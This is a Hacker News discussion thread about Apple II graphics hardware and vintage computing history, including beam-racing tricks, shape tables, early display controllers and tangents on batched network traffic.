Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
Apple II graphics: More than you wanted to know (nicole.express)
168 points by GavinAnderegg on June 28, 2024 | hide | past | favorite | 66 comments


> "Randomly reading from various memory addresses might give the modern programmer some concern about security holes, maybe somehow reading leftover data on the bus an application shouldn't be able to see. On the Apple II, there is no protected memory at all though, so don't worry about it!"

Funnily enough, protected memory (sort of) arrived with the Apple III a couple of years later in 1980 and it was met with complete disdain from the developer community ("Stop trying to control my life, Apple!").

Apple III ROM, hardware, and kernel memory wasn't meant to be directly accessible from the application's address space. The purpose was to increase system stability and to provide a backward-compatible path for future hardware upgrades, but most users and developers didn't see the point and found ways around the restrictions.

Later, more-successful systems used a kinder, gentler approach (please use the provided firmware/bios interfaces please).


The Apple /// is a master class on what NOT to do when designing a computer. Apple still owes us an 8-bit Apple IV computer as an apology for the ///.

The best feature is the dual speed arrows - press and they’ll auto repeat. Press harder and they’ll repeat faster.


Some other hardware features were very good for the time. It gets a lot of heat for the initial reliability issues, but they were eventually solved. They also limited the Apple ][ emulation to 2+ features, so no 80 columns, and that was probably a mistake. On the other hand the good features were:

- Profile hard disk (but would have been better if you could boot from it). - Movable zero page, so the OS and the application each had their own zero page. - As mentioned, 80 column text and high resolution graphics. - Up to 512k addressable RAM, either through indirection or bank switching.

It was probably the most ambitious 6502 based computer, until the 65816 based IIgs came along. And SOS was better than ProDOS.


I remember going to Computerland circa 1981 and they had an Apple /// that they refused to demo for anyone because they were afraid it would burn up. Whatever else might have been wrong about the ///, the /// just plain didn't work reliably.


AFAIK, the ///+ solved most of the problems with the ///, but it failed so badly in the market I’m still looking for one to buy for a reasonable price (I want to try to make it do 384x560 graphics, arguably possible with its interlaced mode).


There's no way a 6502 machine could have beat Z-80 based CP/M machines for business. Not only did the 6502 lack many addressing modes, but it had hardly any registers so you'd struggle even to emulate addressing modes. There was a "direct page" of just 256 bytes that you hypothetically could use to store variables but fitting that into the memory model of languages like C where locals are stack allocated or should look like they are stack allocated is tough.

It was almost impossible to write compilers for languages like Pascal and FORTRAN for the 6502 without resorting to virtual machine techniques like

https://en.wikipedia.org/wiki/SWEET16

or

https://en.wikipedia.org/wiki/UCSD_Pascal

The latter was atrociously slow and contributed to the spectacle of professors who thought BASIC was brain-damaged advocating terrible alternatives. Commodore added a 6809 to the PET to make a machine you could program in HLLs.


The Apple II was a wildly popular business machine by any measure. Visicalc was an Apple app.

Everyone knows the 6502 is a lousy compiler target particularly if all you understand about compilers is 'what C expects', or at least they did once that became relevant. Those of us there at the time weren't harping on HLL support, since people weren't writing their apps in a HLL but in asm, even on the Z-80.


The big issue with the 6502 is being unable to pass lots of parameters on the hardware stack, but that's all there is to it - one approach was to create a parameter stack independent - you'd just push the size of the called memory space to the hardware stack, using 3 bytes per call for up to 256 worth of parameters and local variables.


I remember seeing C on CP/M circa 1984, the Z80 had compiled BASICs, multiple Pascal implementations including Turbo Pascal although assembly was common. It was still common by the late 1980s on the 8086 platform.


A lot of Apple IIs, mine included, got Z-80 coprocessors for running CP/M. The Z-80 card was, IIRC, the first Microsoft hardware product. Alongside with the Videx 80-column card, it was the most popular expansion for the Apple II plus computers in Brazil as I grew up.

I ran my II+ in dual-head mode, with a long green phosphor monitor on the Videx and a color TV on the main board output.


The /// did have a nice OS -- the perhaps unfortunately named SOS, which was an improvement over the original Apple DOS and was the basis for ProDOS which replaced Apple DOS on the 64K and greater Apple II models.


> unfortunately named SOS

I’m sure whoever named it had a painful awareness of what would be the ultimate end of the ///.


I've always wanted a force-sensitive keyboard; the harder you hit a key, the more urgently it handles it. Auto-bolded text? Priority of a CLI command proportional to how hard you hit return?


Microsoft did experiment with that some time ago, but the /// was simpler - it was two switches, one actuated at one pressure and the other requiring more force to actuate.

I think this kind of switch is still made.


It's nifty for music production too, when using "musical typing"


The first generation of home computers used discrete components for the display controller which is crazy expensive because you need lots of counters, comparators, wide data paths, etc which adds up to a lot of parts.

Second generation machines line the VIC-20 and TRS-80 Color Computer used ASICs for the display controller. Apple though the ][ was on borrowed time and has no idea how long it would last so they were slow to come out with the ][e which was cost-reduced.


do you know more home computers that did the display controller like the apple II did?

I think it may be inspiring to people who make their own diy cpus


I think the Commodore PET used discrete TTL as well. This is first generation stuff for home computers, the costs are so high that manufacturers were highly incentivized to make graphics chips as soon as the technology was viable, right around 1979 or 1980. Anything made from then on is going to have a dedicated graphics chip of some kind just for the cost savings.


So did the other member of the "trinity", the TRS-80 model I.

My mental picture is that the kind of display controller I'd like to build is about two large breadboards stuffed with 54xx chips. Such a thing is a bit simpler than a minimal CPU but not that much simpler because you need the stuff to interface with memory. I'd probably want to buy an oscilloscope and/or logic analyzer but maybe I could run it slow and use an AVR-8 Arduino to run test sequences.

Almost everybody who builds throwback computers today uses either an FPGA or a microcontroller for the display controller. For instance

https://github.com/fdivitto/FabGL

is a highly flexible controller implemented for the ESP32 which can do tile-based graphics and sprites for games but also emulate an ANSI terminal. This is used in this SBC

https://www.olimex.com/Products/Retro-Computers/AgonLight2/o...

which I am going to highly recommend because this machine is compatible with the old Z80 machines but has a real 24 bit mode with 24 bit registers and also performs an order of magnitude better than any Z80 machine did back in the day.

Modern systems usually avoid the unified memory model that was popular back in the day but that also usually held back the performance of the CPU because one way or another the VDC was stealing cycles. The AgonLight board communicates with the display controller through a serial port, for instance.

This thing

http://www.commanderx16.com/

has a memory mapped register for the address in video RAM the CPU wants to read/write and another for the data. The address register will auto-increment when access the data register so you can read or write video RAM at high speed just by repeatedly accessing the data register. The CX-16 uses an FPGA as a display controller

https://github.com/X16Community/x16-docs/blob/master/X16%20R...


> " I'd probably want to buy an oscilloscope and/or logic analyzer but maybe I could run it slow and use an AVR-8 Arduino to run test sequences."

that's literally what i want to do because Im too broke for either lol

you can squeeze an arduino's adc utilizing its timers and interrupts instead of using analogRead() in a loop:

https://www.instructables.com/Girino-Fast-Arduino-Oscillosco... https://digibird1.wordpress.com/arduino-as-a-5m-sample-oscil...


two large breadboards stuffed with 54xx chips

There's no need for mil-spec chips for this. Waste of money.


PET used a clone of the Motorola 6845 (also found in MDA and CGA adapters for the IBM PC).

https://en.m.wikipedia.org/wiki/Motorola_6845

https://retrocomputing.stackexchange.com/questions/7117/how-...


The first couple of models used TTLs for the video circuit. These were replaced with the 6845 later on.


See also

https://en.m.wikipedia.org/wiki/List_of_home_computers_by_vi...

Note Don Lancaster's technique used for video in some computers

https://www.tinaja.com/ebooks/cvcb1.pdf

such as

https://en.wikipedia.org/wiki/ZX80

In some strange sense this is like using a microcontroller to implement a CRTC except you're using the main CPU to do the work.


I lot of the Apple video is based on the book the tv typewriter cookbook or something like that by Don Lancaster.


Exactly. I came here to say that. The amazing thing is Lancaster wrote that book before there was a pc of any kind to hook up to. But he showed very clearly how to generate NTSC monochrome video with a bucket of TTL chips. Such good times and good memories. SWTPC sold a kit of that TV Typewriter that I built. Not only Apple and SWTPC but Sol and mo doubt others basically cloned Lancaster’s design.


the discrete hardware part of the Apple II is fascinating window into 1970s hobbyist electronics sometimes. In the flashing text mode, you might think the flashing text (also used for the cursor) is done in software or something. But no, it's a 555 timer gating off the video signal for that particular character.


This reminds me of when my grandpa told me the clicking we hear when we turn on a turn signal is from the old days when a cover used to visibly/audible "click"/close over the light, mimicking a blinking effect.


I always thought it was one of the many relays under the dash.


I think your grandpa was messing with you. Flashing turn signals and the click sound came with a 1938 invention which Buick started putting into cars in 1939.

There were other turn signal approaches used before then, though not all cars had turn signals. Some of those approaches were mechanical, but still don't really align to your grandpa's claim.

https://www.qualityplusautomotive.com/blog/2020/september/th...

https://www.cartalk.com/blogs/jim-motavalli/strange-true-his...


There's a video by Technology Connections all about turn signals:

https://www.youtube.com/watch?v=2z5A-COlDPk

Demonstrates thermal-based flashers as well as capacitor-based flashers. They are clicking because metal is moving and hitting metal.


Only skimmed the video, but did he get into why even the most modern cars, festooned with CanBus controlled light modules and LED almost everywhere, still have incandescent bulbs in the taillights? I'm pretty sure I've even seen those on electric cars.

Once upon a time, an "accidental" feature was that the thermal bimetallic flasher modules would flash much faster if the load was lower. So if you turn indicator flashed fast, you knew that one of the bulbs was out. I've seen this fairly recently; is it "designed in" to modern turn signal systems even though the bimetallic flasher units are long gone? And is that why there's still an incandescent bulb back there - because it's the easiest to monitor for not being functional by just watching the current draw?

Also once upon a time, you could pull out the thermal bimetallic flasher unit and replace it with an "electronic" one consisting of a transistor, a couple of passives, and a relay. Those made a very satisfying loud "CLICK CLACK" kind of noise that was impossible to miss. In my modern, car, I'm pretty sure the tick tock sound is synthetic, but it's also quiet enough that, at least at my age, it's easy to miss.


I think these links should be labeled with NSFDAPFAW (Not Safe For Doing Anything Productive For A While)


This might be a good moment to drop a thing I made last year but never shared the link for. It's a bitmap editor that outputs Apple ][ shape tables.

https://robterrell.github.io/shape_table_maker/shape_draw.ht...

Apple ][ shape tables were a rarely-used vector drawing technique -- rarely used because they were fairly slow to render and there wasn't great tooling for making them. High level of difficulty plus poor results... it was almost as easy to write blitting code, even with the odd Apple ][ video memory layout, so most games ended up doing that instead.

Anyway, if you are curious about shape tables, here's a thing for you.


One thing I used shape tables for was for a fade-in effect. I would draw my spaceship one pixel at a time, choosing the next pixel at random. (I made a tool to help with this, or else it would have been too tedious!) The shape tables were rendered so slowly that it make the ship "materialize" in a cool effect. After this initial fade-in, I would render the ship more sensibly.

Other than this, I never found much use for shape tables.


I used them a lot for fonts. The Take-1 Programmer’s Toolkit was used extensively for animations in educational software back then.


I remember making shape tables manually in high school. Talk about a trip down memory lane.


Goodness me. I wrote a simple 2D flying game using potentiometers for steering and shape tables to draw the little airplanes. It was indeed very slow, but still fun.


Woz is one of the greatest engineers of the 20th century, and the Apple II demonstrates his talent. But his brilliance at simplifying things always straddles the line between optimized and overoptimized. The Disk II might be his greatest feat at doing more with less, while the video circuitry falls just into overoptimization, given the color fringing, NTSC dependence for color, and lack of lowercase. Integer BASIC is somewhere in the middle; great performance (especially given (or maybe because) Woz knew nothing about mainstream BASIC), but the code is so tightly written that it was easier for Apple to license Microsoft BASIC than to add floating-point code to Woz's work.


if you're excited about Apple II graphics, and also about the new Riven remake, but you don't have the VR hardware for Riven, you can try out the recently released Riven-for-Apple-II subset: http://deater.net/weave/vmwprod/riven/


> I'm going to break with my usual habit of ][ and use "Apple II" for the rest of the post.

It very slightly bothered me that "][plus" was typeset before this, but it was "IIe" and not "//e".


//e is only on the boot screen for the Apple IIe enhanced. The un-enhanced uses IIe.


I had to be sure there wasn't a Mandella effect. The logo plate had "//e" reflecting the legacy of the Apple ///. (Also seen on the //c). Then the later Platinum version went to "IIe" since it was in the Macintosh & IIgs era.

The "Apple ][" in the ROM I'd guess came from how hastily they had to regroup after the Apple /// wasn't successful.


The un-enhanced uses IIe

It uses 'Apple ][', oddly enough.


> Many vintage computers are defined by their fonts.

But the article doesn't mention my favorite ASCII table ever, known as the "running man character set":

http://www.lazilong.com/apple_ii/a2font/readme.html

It includes open and closed apples, sand clock, and elements to build GUI's: windows, tabs, scrollbars, and even a pointer!


It hurts so much to see how slow that dragon head is animated in that Ultima intro. I remember a lot of really slow updating in games for the ][.


> Unfortunately, the Apple II doesn’t give the programmer any ability to know where in its cycle the video scanner is at any given time.

So there is no way to race the beam on an Apple II like an Atari 2600/VCS can?


you can race the beam, I've written many demos that use this. On the original Apple II you have to do something called "vapor lock" or "reading the floating bus" where you draw a pattern to memory scanned by the video circuitry, then read an unmapped memory address and you get a "ghost" of the last value read by the video circuitry due to capacitance on the bus. You can then find the beam location, but from then on you have to cycle-count everything. Sather describes this in his book.


Don Lancaster had a software-only method for syncing to the video scan, called the Vaporlock. Which is a play on "genlock", which TV production systems called their hardware to sync to the scan for doing overlays.

Don's technique relied on the fact that the video hardware in the II line scanned memory that was outside the video frame. He put magic values in those extra bytes for each scan line, and his software could detect where the beam was on each line. (I've probably messed up the explanation; it's from memory of 40 years ago...)

The great thing is that you could mix video modes within a single scan line, allowing you to put text on the left edge of a HIRES graph. The downside is that the Apple can't do anything else, because his code is running in an exact timing loop to stay synced.

There were other solutions, but those were all hardware-based.


No, and there was no (easy) way to detect the vertical retrace. For a lot more on that topic have a look at the Apple II mouse card, they needed to synchronise with the video and did work out a software based way of doing it, but the final product added hardware to make it possible.


Glorious 7-bit graphics.


Relevant:

How Steve Wozniak Brought Color to Personal Computers https://www.youtube.com/watch?v=uCRijF7lxzI


> "Randomly reading from various memory addresses might give the modern programmer some concern about security holes, maybe somehow reading leftover data on the bus an application shouldn't be able to see. On the Apple II, there is no protected memory at all though, so don't worry about it! Loosen up! The hacker doesn't need a security hole if there's no security."

I miss computers that didn't have the capability to send all my important data to an unknown address in Belarus in the blink of an eye.

Maybe someone could design a modern desktop operating system whose outgoing network requests are batched and processed once a day, so you can look through the batch before letting it out. This would of course mean that applications must be designed to be extremely thrifty about what data they want to send, or users would simply ban them for making large opaque requests. No more telemetry, no more ad profile updates, etc.


A number of routers can capture every destination address your network has sent data to. You can then go through that list and mark 'safe' the ones where you know where they are going. After about a week you'll go days and days with no new addresses but when one pops up it will be some IoT device or some vistor's phone or something.


This may work for "casual" attempts, but if someone really want to exfiltrate data, they can still do so in any number of ways. For example, they can send DNS queries. To your usual DNS server, so you won't see a new address. Which will happily pass it along to whatever the registered nameserver for the queried domain is.


Absolutely correct, any APT won’t be caught this way. But script kiddies will be every day of the week. And if you’re browser is suddenly sending queries to China after that last add-on, it can be a good bread crumb to follow up.

Security, like dressing for variable weather, is best done in layers.


That would be fun stuff when requesting a web address having to wait for the batch review!

That would indeed be a return to the analog world.


Several years ago I worked on a system that operated quite like this. It used DTN (Delay/Disruption Tolerant Networking) and web proxies to allow really remote villages to get internet by bus or mule drawn carriage or however they got supplies. You would make the request, it would be batched up with all of the other requests and handed off to he supply vehicle that came around every week or twice a week. That vehicle would eventually make it to a bigger city where they had real internet and it would spider out the requests a few layers deep (up to a low number of MB), then the vehicle would make another trek and it would populate a web cache in the villages so someone hitting the same URL would be served a slightly stale version of the content. It also had email so the person who make the request would get a mail stating that it was ready and give them the link.


This reminds me of back when e-mail clients would store your outgoing e-mails in the "outbox" waiting for the next time you dialed in. Nowadays networked software (and much of society) can't handle days of latency, only milliseconds, and I'm not sure that's a good thing.


Not just for dialup network access.

Microsoft Mail for PC Networks used two processes - one for the email client and one for sending/receiving email (aka the "email pump") .

Since Windows 3.x used co-operative multitasking, only one process could run at a time, the email pump detected idle time and start sending/receiving email. Until that processing email time, the user could open the outbox and open outgoing emails, and modify and resend or cancel them.

A few years pass and Exchange 4.0 is about to ship.

But now the second process has been eliminated and emails are sent via RPC to the Exchange server. The user, though, has almost no chance to stop an email from being sent since the email spends almost no time in the outbox before the Exchange server sees and processes the outgoing email.

People actually grumbled about Exchange being too fast.

I took a look through the list of email message properties supported in Extended MAPI. One of them was a "time delay before sending" scalar, measured in seconds.

The Exchange email client (as seen in Win95, also supported on Win3.x and NT) supported extension DLLs. I created an extension DLL that let the user specify a time delay for outgoing emails, and listened for an "email send" notification and then set the user-specified "time delay before sending" property on the outgoing email.

Now outgoing emails would sit in the outbox for the user-specified amount of time before the Exchange server would process them.

Problem solved.

AFAIK the extension DLL was the only code that had set the "time delay before sending" property on emails. It worked the first time I ran the code. Someone did the appropriate testing.

Eventually Outlook 97 shipped. The extension still worked. But a later Outlook update broke the extension DLL. Finally Outlook added support for the "time delay before sending" property for outgoing emails - no need for an extension DLL anymore.


This will be one of the upsides of living on Mars.


Was this ever actually used in real life or was it an experiment only?


We handed it off to people who were supposed to deploy it, but I had to move on after that so I never got to see it live.

I kind of suspect that the window of usefulness was very short since cell towers were springing up even in really remote areas and they'd be a thousand times more useful even with just GPRS level connectivity.


I'd like to have a Slack bot that explains this situation:

"Thanks for contacting pavlov. Due to operating system limits, his reply to your message won't be published until 3pm tomorrow. Your patience is appreciated."

Would be a stress antidote.


Pluto will be prime real-estate for the people who don’t like interruptions.


Stallman uses an email script to read the web https://stallman.org/stallman-computing.html#:~:text=I%20gen....




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: